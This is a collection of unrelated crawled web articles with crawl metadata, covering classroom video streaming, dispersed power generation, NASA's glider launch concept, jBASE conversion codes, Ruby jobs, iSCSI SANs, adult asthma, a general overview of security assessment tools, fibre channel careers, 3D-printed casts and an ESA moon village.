process. Being able to simultaneously stream the same video communication to a number of computers and mobile devices – for example, in a specific classroom – can allow for localized delivery that doesn’t over-tax the infrastructure. As video communication tools become prevalent in academic settings, administrators and IT professionals will need to find better ways of delivering content. The shift toward increased media usage in the classroom has already begun, and institutions that wait on adoption could find themselves struggling to give students and faculty access to the tools they need to remain cutting-edge.
<urn:uuid:8987ef8e-d4c4-4aba-baf0-9a1033065afa>
CC-MAIN-2017-04
http://www.kontiki.com/resources/various-video-communication-tools-take-off-in-classrooms/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00181-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953198
470
2.75
3
By Balaji R, Research Analyst Can Centralized Power Plants Stand-Alone? The United States of America is the world's largest energy producer, consumer, and net importer. It also ranks eleventh worldwide in reserves of oil, sixth in natural gas, and first in coal. The energy sector is the key sector in the U.S. economy, as it contributes $475.63 billion to U.S. GDP as on 2003. Energy consumption is expected to increase more rapidly than domestic energy production through 2025. According to the Energy Information Administration (EIA), the demand for energy is expected to grow by 43 percent through 2025. The Distributed Energy and Electric Reliability Program (DEER) of the Department of Energy (DOE), has set a national goal for DEER to capture 20 percent of new electric generation capacity additions by 2020 (Office of Energy Efficiency and Renewable Energy 2000). Competition as a result of deregulation is driving utilities and consumers to seek out alternate means to reduce the cost of electricity. The centralized model is losing its viability on the account of large-scale investment and deregulation. It becomes an uphill task to supply electrical power with high reliability in the conventional power system structure. The utility industry is expected to shift generation slightly away from the traditional central station philosophy to decentralized generation. Decentralized Generation is the production of electricity at or near the point of use, irrespective of size, fuel or technology. Decentralized electric generation will reduce capital investment, lower the cost of electricity, reduce pollution, reduce production of greenhouse gas, and decrease vulnerability of the electric system to extreme weather and terrorist attacks. Decentralized Generation can be distributed or dispersed and can be powered by a wide variety of fossil fuels. - Distributed power generation is any small-scale power generation technology that provides electric power at a site closer to customers than central station generation. - Dispersed generation is a decentralized power plant, feeding into the distribution level power-grid and typically sized between 10 and 150 MW. Distributed generation is used mainly for onsite power generation. Dispersed generation is strategically located on the transmission grid to overcome bottlenecks in the transmission and distribution system and to improve the stability of the system. Features of Dispersed Generation Dispersed generation reduces both power transfers between regions of the power system and power imbalance in each region. Dispersed generation also allows for a uniform distribution of the overall system by responding fast to demand variation. Dispersed generation offers more flexibility and can be dispatched in incremental blocks of power as needed. It provides reliability and stability to the system. Total failure can be avoided when the load centres are supported by dispersed generation. A major outage such as the one experienced in August 2003 could have been avoided with the help of dispersed generation powered by reciprocating engines, by bringing power back online within 10 minutes. Drivers and Challenges for Dispersed Generation - Low cost of electricity -. The fact that the consumer is benefited with low cost of electricity could well be the key driver for dispersed generation. - Geographical factors- Existence of transmission congestion and high price in major metropolitan areas provide ample potential for dispersed generation. - Saving on outage cost - The rising demand for premium power may force many industrial and commercial consumers to switch to dispersed generation to protect against the risk of power outages (Figure 1). - Increasing demand in intermediate sector - Flexibility to meet intermediate load accelerates the demand for dispersed generation. - Low payback period- as utility providers are worried about investing for long-term, dispersed generation calls for lesser investment and lower payback period. - Utility attitude- As utility owners are worried about the recovery of stranded assets, they offer resistance in implementation of dispersed generation - Consumer perception -As there are a few success stories concerned with dispersed generation in the United States, consumers are apprehensive about the future of dispersed generation. - Government regulations (state and federal) – Future development of dispersed generation markets largely depends on the regulator’s policy and framework. - Grid interconnection issues - various issues like safety, lack of uniform standards, impact on grid snags dispersed generation. Wärtsilä’s Activities in Dispersed Generation Capitalizing on the potential available in North America for decentralized generation, Wärtsilä Corporation has set up many dispersed generation plants. The hot and dry conditions in mountain states and existence of transmission congestion and high price in major metropolitan areas provide ample potential for Wärtsilä’s dispersed generation. One of the success factors for Wärtsilä’s Plains End project is its reciprocating technology, which demonstrated consistent heat rate and output at the ‘mile-high’ elevation. The engine remained less susceptible to change in ambient condition. During the performance test at the site, Plains End units achieved 44.2 percent efficiency (LHV) at full load, and 39.7 percent efficiency (LHV) at 50 percent load. Wärtsilä’s core competencies such as a high-level standardization, fast-track delivery and full-service capabilities, enabled Wärtsilä to capture a significant share of the North American market for dispersed generation peaking plants While decentralized generation is unlikely to replace central power entirely, the share of decentralized generation in U.S. power generation will increase dramatically in coming years, with important benefits to all segments of the population and significant environmental benefits. While dispersed generators are unlikely to compete with central power station, customers will be attracted by, the desire for reliable power that could be the driving factor for the future of dispersed generation. As the quality of the centralized power system as a whole, and its ability to transmit power to the load where and when needed is questioned, a diverse portfolio including dispersed and distributed generation will serve to supplement and increase the reliability of the overall system.
<urn:uuid:3721390c-b245-4da6-8f9a-92c2ca2a99e4>
CC-MAIN-2017-04
http://www.frost.com/sublib/display-market-insight-top.do?id=27284029
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00486-ip-10-171-10-70.ec2.internal.warc.gz
en
0.921193
1,214
3.34375
3
NASA recently detailed what it called an inexpensive, possibly automated rocket launching system that uses a towed glider to send payloads into low Earth orbit. NASA's Dryden Flight Research Center Towed Glider Air-Launch Concept would use a glider that would be towed to an altitude of 40,000 feet by a large transport aircraft such as a 747. A rocket would be slung under the belly of the glider and launch after the craft reached its desired altitude. "Engineers continue working trade-offs with launching the rocket either with the glider still in tow, or following release from the tow aircraft. Either way, after the rocket has launched, the empty glider will return independently of the tow aircraft to the runway to be used again," NASA stated. NASA says air launch systems could save as much as 25% over vertical ground launches, according to Defense Advanced Research Projects Agency studies. "It's a real estate problem," said Gerald Budd, a NASA Dryden business development and towed glider project manager in a statement. "You're limited in what you can fit underneath an existing aircraft. Launching off the top of a carrier aircraft is problematic from a safety perspective. Our approach allows for significant payloads to be carried aloft and launched from a purpose-built custom aircraft that is less expensive because of the simplicity of the airframe, having no propulsion system (engines, fuel, etc.), on board." Budd said a 24-foot wingspan, twin fuselage proof-of-concept glider model being constructed by NASA Dryden that will fly later this year, towed aloft by one of Dryden's unmanned aircraft. A similar launch system is being developed by entrepreneur Paul Allen and Burt aerospace designer Burt Rutan. Their Stratolaunch Systems craft, announced in 2011 has three components: - A carrier aircraft, developed by Scaled Composites, the aircraft manufacturer and assembler founded by Rutan. It will be the largest aircraft ever flown. - A multi-stage booster, manufactured by Elon Musk's Space Exploration Technologies; - A state-of-the-art mating and integration system allowing the carrier aircraft to safely carry a booster weighing up to 490,000 pounds. It will be built by the Dynetics aerospace engineering firm. Check out these other hot stories:
<urn:uuid:61329a03-a548-4950-adaf-d9b98f12bac8>
CC-MAIN-2017-04
http://www.networkworld.com/article/2223849/data-center/nasa-exploring-glider-based-rocket-launcher.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00486-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954906
474
3.53125
4
The MD code transforms integers by scaling them and inserting symbols, such as a currency sign, thousands separators, and a decimal point. The ML and MR codes are similar to MD but have greater functionality. n is a number from 0 to 9 that specifies how many digits are to be output after the decimal point. Trailing zeros are inserted as necessary. If n is omitted or 0, the decimal point is not output. m is a number from 0 to 9 which represents the number of digits that the source value contains to the right of the implied decimal point. m is used as a scaling factor and the source value is descaled (divided) by that power of 10. For example, if m=1, the value is divided by 10; if m=2, the value is divided by 100, and so on. If m is omitted, it is assumed to be equal to n (the decimal precision). If m is greater than n, the source value is rounded up or down to n digits. The m option must be present if the ix option is used and both the Z and $ options are omitted. This to remove ambiguity with the ix option. Z suppresses leading zeros. Note that fractional values which have no integer will have a zero before the decimal point. If the value is zero, a null will be output. , specifies insertion of the thousands separator symbol every three digits to the left of the decimal point. The type of separator (comma or period) is specified through the SET-THOU command. (Use the SET-DEC command to specify the decimal separator.) $ appends an appropriate currency symbol to the number. The currency symbol is specified through the SET-MONEY command. ix aligns the currency symbol by creating a blank field of "i" number of columns. The value to be output overwrites the blanks. The "x" parameter specifies a filler character that can be any non-numeric character, including a space. c appends a credit character or encloses the value in angle brackets (<>). Can be any one of the following: - Appends a minus sign to negative values. Positive or zero values are followed by a blank. Input conversion works with a number that has only thousands separators and a decimal point.
<urn:uuid:ba697e0f-b17a-49e2-95a7-c2d3a5ce5faa>
CC-MAIN-2017-04
http://www.jbase.com/r5/knowledgebase/manuals/3.0/30manpages/man/jql2_CONVERSION.MD.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00394-ip-10-171-10-70.ec2.internal.warc.gz
en
0.829608
479
3.515625
4
What is it? Ruby is a relative latecomer among scripting languages but it has developed a distinct niche for itself. In an increasing number of job adverts it is part of an either/or pair with Python. Like Python, Perl, PHP and Tcl, it is downloadable, and there are plenty of free online resources to help you learn it. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Ruby is an interpreted scripting language for object oriented programming. Enthusiasts describe it as simple, extensible and portable. Together with the Rails open source framework for developing database-backed web applications it is said to be several times as productive as some more mainstream approaches. Although it is a pure object oriented language, Ruby can masquerade as a procedural one. Its syntax and design philosophy are heavily influenced by Perl. The Ruby FAQ, says, “If you like Perl, you will like Ruby and be right at home with its syntax. If you like Smalltalk, you will like Ruby and be right at home with its semantics.” Where did it originate? The language was created in Japan by Yukihiro Matsumoto, and first released in 1995. What is it for? Ruby tries to reduce the slog of programming by pushing as much routine work as possible onto the machine. Like Python, it provides a transition from procedural to object oriented programming for people without object oriented experience. Ruby is written entirely in C, and writing C extensions in Ruby is easier than in Perl or Python. What makes it special? Ruby champions claim that so much Java work is directed at making corporate developments easier that simpler tasks are being made harder. What systems does it run on? Ruby was developed on Linux, and runs under Unix, Windows 95/98/NT/2000, Mac OS X and others. How difficult is it to master? Matsumoto says Ruby’s primary design consideration is “to make programmers happy” by reducing the menial work they must do. Where is it used? In last week’s appointments pages, Ruby skills were being sought by several web developers, a couple of merchant banks and an online booking specialist. What’s coming up? The latest stable version is 1.8.4. Ruby 1.9, which introduces some major changes is in development. A good starting point is the Ruby and Ruby on Rails main sites. There is an introduction to Ruby programming in graphic novel style. Rates of pay Ruby is beginning to figure in the portfolios required from Java, C/C++ and web developers, often as an alternative to Perl and Python. Ruby developers typically earn between £35,000 and £40,000.
<urn:uuid:366f5286-acc0-4006-a786-4bdddec93b6d>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240077442/Hot-skills-Could-Ruby-be-the-jewel-in-the-crown-of-scripting
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00302-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953857
580
2.71875
3
Here are some tips on what to look for in iSCSI target devices, including disk arrays, bridges, and tape libraries. By Michael Maxey Building an iSCSI SAN has been billed as a simple task that leverages in-house networking knowledge and standard IP infrastructure. All that is required is an initiator and a target. Put the two together and you're finished managing storage on individual servers. In the end, this is true. However, when it comes to selecting the components of an iSCSI SAN, things can get confusing. There are a variety of vendors and products, each with varying levels of functionality. Understanding the differences and choosing the appropriate solution for your enterprise can be a daunting task. This article breaks down the components of an iSCSI SAN to provide a higher level of understanding of the associated functionality. In its simplest form, building an iSCSI SAN requires implementing an initiator and a target. Initiators are installed on host servers and can be software- or hardware-based. Software initiators can use any standard network interface card (NIC) and leverage the host CPU for TCP/IP processing. Hardware initiators offload some or all of the TCP/IP processing, freeing up host CPUs to run applications. Hardware initiators can also perform advanced functions, including data multi-pathing or remote server boot. In the past this publication has presented several articles covering iSCSI initiators, so this article focuses on the target side of the equation. iSCSI targets fall into three categories: disk arrays, bridges, and tape libraries. iSCSI disk arrays and bridges provide similar functionality, but are implemented differently. iSCSI arrays are an all-in-one system with iSCSI SAN functionality and disks included. Bridges do not include disks. Instead, they rely on external SCSI or Fibre Channel storage. When you're choosing an array or bridge there are five feature categories to consider: high availability, performance, data services, security, and management. High-availability features are designed to keep the SAN functioning when a failure occurs. Although the focus of this article is the overall SAN, it is important that the individual devices provide redundant hardware and appropriate RAID levels to safeguard your data. There are many high-availability features to examine when implementing multiple modules. For example, can the targets be clustered to provide maximum bandwidth and availability? If not, can an extra module be purchased to provide a fail-over scenario? If your hosts are clustered, be certain that the iSCSI target will support shared data access. It is also important to consider the availability of the SAN database. Much like conventional databases, iSCSI SANs require pointers or indexes to locate the data blocks. If the primary module fails, is the database still available? Performance features ensure fast access to data. In some instances, a single server can utilize multiple IP connections to an iSCSI target. This aggregation of bandwidth is called multi-pathing and requires the use of a hardware initiator. When multiple servers frequently access data that is kept on a single array, hosts may contend for system resources. Spreading this data across multiple modules (load balancing) will free up resources and increase performance by providing separate paths for each application. Data services features enable disaster recovery and simplify backup. To protect mission-critical data, an iSCSI system should be able to create a synchronous copy on additional iSCSI targets. Beyond real-time replication, the ability to perform asynchronous copies of data across a WAN connection provides off-site disaster recovery. The addition of point-in-time copies or snapshots simplifies backup by allowing continuous access to the source volume while an archive is created from the copy. For bridge devices, data migration between different classes of attached storage enables better resource allocation and data life-cycle management. Security features should not be overlooked. It is well-known that IP is more susceptible than Fibre Channel to security failures. Tools for IP hacking are prevalent and mature. It is recommended that IP SANs be created on separate networks to help combat this vulnerability. Beyond separate networks, the iSCSI target should implement Access Control Lists (ACLs) to manage iSCSI login authentication. Data encryption and checking the security of the management interface or Web GUI are also important. Management features should be examined. IT staff costs are important to consider when you are choosing a solution. As your SAN scales up to multiple targets, will they be managed as a single entity? Look at the virtualization options. Will all the targets provide storage to a single universal pool that can be divided among the SAN hosts? How do you scale the SAN when new targets are added? Will the solution integrate into the overall management framework via SNMP or agents? The final category of iSCSI targets is tape libraries. These devices provide multiple servers with IP access to a shared library. When evaluating these products it is important to understand the number of hosts that are supported. This can be determined by looking at the number of initiators per port. Each initiator represents a single host. Library partitioning is another interesting feature. The ability to devote a portion of the library to iSCSI connections enables administrator flexibility when configuring backup. To help increase performance, drive spanning or data streaming spreads the data flow across multiple tape drives. Similar to multi-pathing, this feature will increase performance and shorten the overall backup window. Also, be sure to verify that the iSCSI tape library supports the backup application in use at your facility. The iSCSI standard provides SAN protocols that can deliver cost savings and easy management. Today, vendors of these products have begun to deliver on that mission. By carefully evaluating the various options ands functions, you should be able to choose the appropriate solution and make these savings a reality for your enterprise. Michael Maxey was formerly a senior storage analyst at Progressive Strategies, an independent market research and consulting firm. He is now a product marketing manager at McData. The article was written when he was with Progressive Strategies. Representative iSCSI vendors iSCSI bridges/routers/switches (hardware only) - ATTO Technology - StoneFly Networks - American Megatrends Inc. (AMI) - Dell (EMC OEM) - LeftHand Networks - Network Appliance - Nimbus Data Systems - Overland Storage - Promise Technology - Snap Appliance (recently acquired by Adaptec) - Overland Storage - Spectra Logic
<urn:uuid:6bbfe0ba-977b-4d38-b237-75c48cfab772>
CC-MAIN-2017-04
http://www.infostor.com/index/articles/display/211932/articles/infostor/volume-8/issue-9/features/what-you-need-to-build-an-iscsi-san.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00422-ip-10-171-10-70.ec2.internal.warc.gz
en
0.900954
1,338
2.578125
3
TORONTO, ON--(Marketwired - May 05, 2014) - Doug Cooper was surprised when his doctor told him he had asthma, not because he'd had no symptoms -- his breathing had been troubling him for a while. He just wasn't expecting an asthma diagnosis at the age of 50. "I'd always assumed that asthma was a disease that started in childhood," said the retired aircraft engine technician. "I learned that asthma can develop at any age." One in 10 Ontarians over the age of 40 has asthma. Many of them have lived with the illness since childhood. Sometimes, asthma that went away after childhood reappears later in life. But asthma can also occur in adults and seniors with no history of respiratory problems. Elderly people accounted for three-quarters of the 218 asthma deaths in Canada in 2011. "Older people often dismiss symptoms as a normal part of aging," said Dr. Anna Day, respirologist at Women's College Hospital in Toronto, and spokesperson for the Ontario Lung Association. "As a result they might not realize they have asthma until the disease becomes moderate or severe." Symptoms of asthma include coughing, wheezing, airway tightness, shortness of breath and mucus production. These symptoms can be aggravated by colds and viruses, allergens, air pollution, strong smells, cold weather, humidity, exercise and stress. Dr. Day said that early, accurate diagnosis is vital. "Once asthma is confirmed, there are effective management strategies to keep it under control. Well-controlled asthma should not limit your life and you should be able to exercise and sleep normally. With well-controlled asthma you are less likely to have a potentially dangerous asthma attack or risk permanent damage to your lungs." Diagnosis starts with the health-care provider, who will conduct a physical examination and ask questions about family history, symptoms and other related conditions. Next comes a simple breathing test called spirometry during which the patient blows into a machine that measures air flow and volume. "Patients with adult-onset asthma face special challenges," said Carole Madeley, director of respiratory programs with the Ontario Lung Association. "They often experience a more rapid decline in lung function and more severe and persistent airflow limitation." Mould exposure at home and at work is an important cause of asthma later in life. Exposure to other workplace triggers is another common cause of adult-onset asthma. There are more than 300 substances known to cause occupational asthma, including wood dust at sawmills, chemical fumes in the plastics industry or flour in a bakery. Adult-onset asthma can also become a problem with prescribed as well as over-the-counter medications. These include non-steroidal anti-inflammatory drugs such as ibuprofen, naproxen or aspirin and beta-blockers for hypertension or glaucoma (e.g., Propranolol). Asthma in adults and seniors can be triggered by everyday allergens -- mould, dust mites, pet dander, pollen, etc. -- as well as exposure to tobacco or marijuana smoke. Asthma symptoms in older patients are often masked by -- or even caused by -- other diseases that have similar symptoms. The most common are chronic obstructive pulmonary disease (COPD) and cardiac conditions such as congestive heart failure and arrhythmias. Other diseases that mimic asthma include pulmonary fibrosis, pulmonary embolism, lung cancer, obesity, sinusitis and gastro-esophageal reflux disease. The Ontario Lung Association is a registered charity that provides information, education and funding for research to improve lung health. The organization focuses on the prevention and control of asthma and chronic lung disease, tobacco control and clean air. The Lung Health Information Line -- 1-888-344-LUNG (5864) -- is staffed by certified respiratory educators. The following files are available for download:
<urn:uuid:a8421af8-79cf-44a4-8aca-a2b5f3edd942>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/asthma-is-not-just-kids-stuff-1906284.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00082-ip-10-171-10-70.ec2.internal.warc.gz
en
0.964112
802
2.71875
3
Tools and techniques to discover security threats and vulnerabilities There are many techniques through which can safe himself. It is not necessary that one has to wait till the attack happens, he can already takes some measures and can check if those attacks can happen in the future or not. They can be done by some tools which can attest and can estimate the extent to which a computer is open for attacks. Here are some ways through which one can help himself in this regard; Interpret results of security assessment tools The first important thing about the tools is the interpretation. One must be able to interpret the results which are generated through these tools so he can use them in the future too for the betterment. There are the tools which can be sued to ensure that the system would stay safe in the computer and if these tools indicate that there is going to some problem in the future, then one should surely consider changing the structure and making the defences become more effective since the data safe should be the first priority of any person. Here are the tools which can be utilized to manage and analyse the performance of the system; Protocol analyser: this is the tool which can be the both hardware and the software. It is used for capturing the traffic and it can even analyse the signals and hence the whole traffic can be checked over some communication channel. These channels can vary in nature like they can be from someplace like the computers bus to some link of satellite. It can provide some means of the communication through the standard protocol of communication. Each of these types of the protocols has some various tools which can be used for the collection of the signals and the data. Vulnerability scanner: it is always important to one for check out with the defensive techniques of the computer and check whether they are good enough or not. There is the volnerability scanner, this software can be utilized for checking out whether the program is designed to attack the computer or not. It can access the computer system, the applications and the network and hence can tell whether a computer is weak enough to get attacked or not and how much there are chances that it would be infected. This can also be run as the part of some vulnerability management by the things which are tasked with the protection of system. Also, they can be used by some of the red hats and black hats to get some access to the unauthorized data. Honeypots: The computer has a different usage for the term honey pot. Is basically some trap which has been set for detecting or deflect some attempts which are done in order to get access to the computer system and the unauthorized usage of the information system. Normally, a honey pot is consisted of some data of computer. Or it might also contain some network website which can become some part of that network easily. But normally, it is monitored and is isolated. Hence it seems to contain some information and the sources of value to the hackers. This thing is much more similar to the baiting which is set by the police for some criminal. Then that bait is conducted through some surveillance which is under cover. Honey nets: honey net is actually software which is open net. It is developed by many people who want to help other for checking out their security systems and how easily their computers are to be attacked by some attackers and the hackers. There are some high interaction based honey pots too. These are the solutions which do not actually emulate. In fact, they are like OS which function full fledge those system and the application can be found easily in many homes now so one can also bring that thing in their computer and get them protected by some malicious attacks which can comprise their data security. Port scanner: The port scanner is basically a software application which is designed for the probe of the host or server against the open ports. This thing is mostly used by many administrators to help them verify the policies of security related to the networks they have and by some hackers as well, so that know can identify some services which are being run with even some view. The port scan is known as the attack which is sent to the client. It requests the ranges of the server ports addresses which are there on some host. This is done with some goal setting of finding out a port and then checking out for some vulnerability which is known for those services. Many of the major people who use that don't do it for the intention of attacking. The just do it so that they can determine some services which are there on some machine which is controlled remotely. There can be so many hosts which are there for some specific ports. Some of them are utilized when it comes to the searching for some specific services like the computer which is SQL based might be looking there for the host which are listed on the port 1433 of TCP. Passive vs. active tools: There are two types of the tools and they are active and passive. Active tools are that when an attack happens they detect them and take some actions immediately so the computer says protected and the passive tools are opposite. Open the detection, they don't really take any action and they just stay there and send warning to the users so he can take some action. Banner grabbing: When it comes to some computer network, this thing is the technique which is used for getting some information which is related to some computer system on a specific network. These services are run there to get the ports opened. There are the admins which can sue this thing to take the inventory of that system and the services which are available on those networks. But, the intruder can make usage of those banner grabbing's so that he can find some network hosts which are running some various versions of the operations system and some application with some known exploits. Risk is something which indicates that there sure the chances that computer can get effected form some attack. Risk isn't as bad as the threat, but still it is bad and the reason is that there are some chances that it can destroy that computer. Basically, risk is a bigger term. It involved both the threat and the likelihood of the threat. Threat vs. likelihood: The threat is something solid. It means that there are the changes something is going to happen for sure and that thing is bad. The likelihood includes the probability that something which is going to happen, might not happen and might even happen. So there is never a security which involved in it. The assessments can be done in some various ways. Like one can know that what are the risks and the threats which are associated to some software downloading and usage and to which extend they are more likely to make some damages. Here are the assessment types which are commonly used; Risk: Whenever there is something risky, it means that there is a probability involved that it might or might not affect the system. The risk is typically conceived as less risky than the threat. Since in the case of risk, it might happen that some miracle can save the system and the data is destroyed. Threat: Threat is something bad. It is something concrete and it means something is surely going to happen and it doesn't involve any of the probability that there would be some chances of occurrence. The threat is more dangerous so one should stay away from the things which can expose some threats. Vulnerability: This term means that how prone the system is to the attacks. It actually defines the defensive system of a system. If a system has got some strong defences then it would be easy for it to take care of it and if the system is bad, then there can be many threats which would be posed by the system and hence it will surely get infected. There are some techniques which are called as the assessment techniques. This technique plays some important role when it comes to knowing about the assessment of the techniques which have been implemented for the security of the system. Here are some of those assessment techniques which can be sued by one; Baseline reporting: This is basically a measurement for the very basic level. It is the process of managing change as well. This is, that when some problem happens, it does t just happens rapidly it first hits some baseline. When it does, that activity should be reported first so that one can already get alert that some problem is going on and those issues need to be addressed properly. Code review: this is the systematic examination and is often known as the reviewing as well. This is basically the examination of the sources codes which are in the computer. It is specially designed to find the mistakes and get them fixed by overlooking them into some initial development time. Hence it can help the developer improving his skills by also improving the quality of that software. These reviews are carries out in some different forms like the informal walkthroughs, the inspections, pair programming's etc. these codes can often be found and can be removed the various vulnerabilities. These can be the race conditions, the buffer overflows, memory leaks etc. hence the security of the software is improvised overall and one can be ensured that the system which is sued, is secured. Determine attack surface: This is the tool which has even created by one for analysing the changes which have been made for attacking the surface which is in the OS. They are designed for the OS which are the windows Vista and beyond. This tool is very important one and hence is also recommended by the Microsoft itself. This recommendation is done at the stage where the verification takes place. This is the one of tools which can also analysis that changes which has been made to the windows 6 series OD. So in those tools, one can easily analyse what is changed and where it has happened. That change can happen in the server, assemblies, and registry and file permissions, etc. the Microsoft also claim that this is the same tool which is being used by the engineers at the office to test the effectiveness and the effects of the software which is installed on the OS. Review architecture: Another important thing that many people over look many times is the architecture's review as well. The way the software is designed can tell a lot about the software and the performance. Software which is built upon some strong bases would stay for long since it would have more power to stay sharp and can defend the system very well. So the architecture should be reviewed as well so that one can ensure the safety of system. Review designs: Another important thing which should pop up into one's mind is the design can explain much about the software, the design can indicate whether the software is flawless or not and should it be trusted or not. Hence, there are many ways which can be sued by the people so that they can know there is nothing wrong that is going to happen in the future. Also, they can be assuring of the fact that he can make some measure sin advanced so he knows that he can stay safe. Also, while buying a system or establishing a connection, then too one can check the defensive technique of the computer through them so he can make some good purchase decisions.
<urn:uuid:6746d346-c55d-4b56-96e6-94a15a8c81f0>
CC-MAIN-2017-04
https://www.examcollection.com/certification-training/security-plus-tools-and-techniques-to-discover-security-threats-and-vulnerabilities.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00568-ip-10-171-10-70.ec2.internal.warc.gz
en
0.979513
2,224
2.8125
3
Fibre Channel Surfing Fibre channel, fibre channel, where art thou fibre channel? If fibre channel were actually something that could get lost, that would be a great opening, but a better question for the purposes of this article might be, “When art thou fibre channel?’ As in, when is fibre channel the right choice to solve a storage problem? Chris Lionetti, Microsoft senior SAN engineer, said fibre channel is a protocol, a language that is used to connect two devices. For instance, fibre channel would enable a server and an initiator (somebody who wants to talk) to talk to a target or a piece of storage. “It’s a language, but it’s designed to be extremely expandable, Lionetti said. “Whereas SCSI, which stands for ‘small computer systems interface,’ was really designed for a few devices, fibre channel is designed for hundreds, if not thousands or billions, of devices. “It’s designed not for one host or a couple of hosts but an infinite number of hosts. It’s pretty much the de facto standard for things like clustering nowadays. It’s kind of an enabling technology that lets you do a lot of other things, as well.” Although Lionetti said fibre channel is very popular when you need it, the real issue for IT professionals looking for storage career advice and not storage technology solutions is whether the fibre channel language will be a viable direction or path to pursue. “The person who wants to get into this field would actually want to learn about SAN, storage area networking,” Lionetti said. “Fibre channel just happens to be the most popular method of making a SAN.” The fibre channel topology, or the layout of how you connect all your devices so your host can see your storage, enables you to map and connect everything together to fully realize the benefits of the hardware. Lionetti said it’s important to remember things in the storage world that people normally haven’t considered. For instance, in the storage world, you directly connect everything. In the fibre channel world, it’s more of a SAN, which means networking terms play a role, as do networking ideas. “Something that everybody in networking understands is oversubscription,” Lionetti said. “To storage people, that may be a new term, but oversubscription is something in a storage area network that you have to be very, very concerned with. “Oversubscription is simply overloading your buses (the physical connection between the two devices) to the point where you could theoretically bottleneck but in actuality, because you know what your performance is, you wouldn’t really bottleneck. It’s knowing how far you can push it and where you can push beyond.” Ralph Luchs, Storage Networking Industry Association (SNIA) education director, said if you’re considering fibre channel as an area of specialization, there are many different certifications that might aid your career cause. He also said, though, that storage professionals should remember fibre channel is only one way to connect storage networks, have devices talk to servers, etc. There are other opportunities in use in the market. “Some of them go over a regular network, some of it goes through a SCSI (small computer system interface),” Luchs explained. “Fibre channel is just one of the standards. If what you’re looking for is to be specifically trained on that standard, there are a number of certifications out there from places such as the Fibre Channel Industry Association and vendors out there that specialize in providing training on fibre channel. “However, for storage professionals, especially if they’re thinking they’d like to get into the storage networking arena, just getting certified on fibre channel would probably not be the place where I would start. I would suggest going with a little bit more broader approach.” SNIA has a set o
<urn:uuid:5a5cc673-26d0-49de-b057-3350157a1464>
CC-MAIN-2017-04
http://certmag.com/fibre-channel-surfing/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00384-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949617
851
2.6875
3
A New Zealand student has invented a 3D-printed brace to take on the plaster cast. Using a 3D scanner hacked from an Xbox Kinect, Jake Evill – a recent graduate of Victoria University in Wellington, New Zealand – has developed a 3D-printed brace prototype called the ‘Cortex cast’. The brace is an injury-localised exoskeleton that follows the contours of the broken limb. It is lightweight, washable and recyclable. The cast will typically be three millimetres thick and will weigh under 500 grams. The Cortex is designed to mimic the body’s trabecular, the small honeycomb-like structure that makes up your inner bone structure. “It was this honeycomb structure that inspired the Cortex pattern because, as usual, nature has the best answers,” said Evill. Although the Cortex is in very early development, Evill is planning on working with a hospital to fully test the prototype as well as finding a manufacturer for the product.
<urn:uuid:1772c908-efae-4e13-9cac-f520943ec36d>
CC-MAIN-2017-04
http://www.pcr-online.biz/news/read/student-makes-3d-printed-casts-from-hacked-xbox-kinect-to-heal-broken-bones/031334
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00018-ip-10-171-10-70.ec2.internal.warc.gz
en
0.948345
214
2.734375
3
A Signature is a cryptographic mark appended to a message, which is formed by encrypting the message with the signing user's Private Key. The user's Public Key is usually attached as well, for convenience. A Signature effectively demonstrates that the purported sender of the message did, in fact, sign it, since only he possesses the key required to encrypt it in such a way that his Public Key will successfully decrypt it.
<urn:uuid:68c455ef-53fb-45c6-870b-71cd0f688115>
CC-MAIN-2017-04
http://hitachi-id.com/concepts/signature.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00046-ip-10-171-10-70.ec2.internal.warc.gz
en
0.961534
88
2.84375
3
The new leader of the European Space Agency (ESA) is quite eager to see humans build a small city on the far side of the moon. CityLab talked with Johann-Dietrich Woerner, who became director general of the ESA in early July, about his vision for a community on the moon devoted to invading and conquering Earth scientific and technological research: “Why not have a moon village?” says Woerner. “A moon village not meaning a few houses, the town hall, and a church—the moon village would consist of a settlement using the capabilities of different space-faring nations in the fields of robotic as well as human activities.” Sure, but let's not rule out the town hall and some green space; why shouldn't a moon village be quaint? Quaint draws tourists, baby! CityLab has all the geeky details about how the city would be constructed (using robots at first) and what it would need ("habitation units, laboratories, power generators, facilities for processing lunar water and resources, a manufacturing workshop, and a greenhouse"). Regarding placing the village on the far side of the moon, Woerner assures CityLab: “It’s not the dark side of the moon as Pink Floyd was thinking,” he says. “The far side of the moon—the hemisphere of the Moon that always faces away from Earth—is as bright as the side of the moon we see. You know that sometimes during a month the moon is dark. At that time, the other part of the moon is very bright.” Woerner offers no timetable for when a moon city might be constructed, so hold off on lobbying for an NFL franchise there until we can pin him down. This story, "Space agency head wants to build a village on far side of moon" was originally published by Fritterati.
<urn:uuid:342d58e9-28d7-466e-bcb6-80491b98d3d9>
CC-MAIN-2017-04
